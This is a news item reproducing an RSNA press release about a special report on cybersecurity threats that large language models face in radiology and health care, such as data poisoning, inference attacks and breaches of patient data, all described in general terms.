Over 40 Pennsylvania Auctions End Tomorrow 05/15 - Bid Now
Over 400 Total Lots Up For Auction at Two Locations - NY 05/20, TX 05/22

Special report highlights LLM cybersecurity threats in radiology

Press releases may be edited for formatting or style | May 14, 2025
OAK BROOK, Ill. — In a new special report, researchers address the cybersecurity challenges of large language models (LLMs) and the importance of implementing security measures to prevent LLMs from being used maliciously in the health care system. The special report was published today in Radiology: Artificial Intelligence, a journal of the Radiological Society of North America (RSNA).

LLMs, such as OpenAI's GPT-4 and Google's Gemini, are a type of artificial intelligence (AI) that can understand and generate human language. LLMs have rapidly emerged as powerful tools across various health care domains, revolutionizing both research and clinical practice. These models are being employed for diverse tasks such as clinical decision support, patient data analysis, drug discovery and enhancing communication between health care providers and patients by simplifying medical jargon. An increasing number of health care providers are exploring ways to integrate advanced language models into their daily workflows.

"While integration of LLMs in health care is still in its early stages, their use is expected to expand rapidly," said lead author Tugba Akinci D'Antonoli, M.D., neuroradiology fellow in the Department of Diagnostic and Interventional Neuroradiology, University Hospital Basell, Switzerland. "This is a topic that is becoming increasingly relevant and makes it crucial to start understanding the potential vulnerabilities now."
stats
DOTmed text ad

We repair MRI Coils, RF amplifiers, Gradient Amplifiers and Injectors.

MIT labs, experts in Multi-Vendor component level repair of: MRI Coils, RF amplifiers, Gradient Amplifiers Contrast Media Injectors. System repairs, sub-assembly repairs, component level repairs, refurbish/calibrate. info@mitlabsusa.com/+1 (305) 470-8013

stats
LLM integration into medical practice offers significant opportunities to improve patient care, but these opportunities are not without risk. LLMs are susceptible to security threats and can be exploited by malicious actors to extract sensitive patient data, manipulate information or alter outcomes using techniques such as data poisoning or inference attacks.

AI-inherent vulnerabilities and threats can range from adding intentionally wrong or malicious information into the AI model's training data to bypassing a model's internal security protocol designed to prevent restricted output, resulting in harmful or unethical responses.

Non-AI-inherent vulnerabilities extend beyond the model and typically involve the ecosystem in which LLMs are deployed. Attacks can lead to severe data breaches, data manipulation or loss and service disruptions. In radiology, an attacker could manipulate image analysis results, access sensitive patient data or even install arbitrary software.

You Must Be Logged In To Post A Comment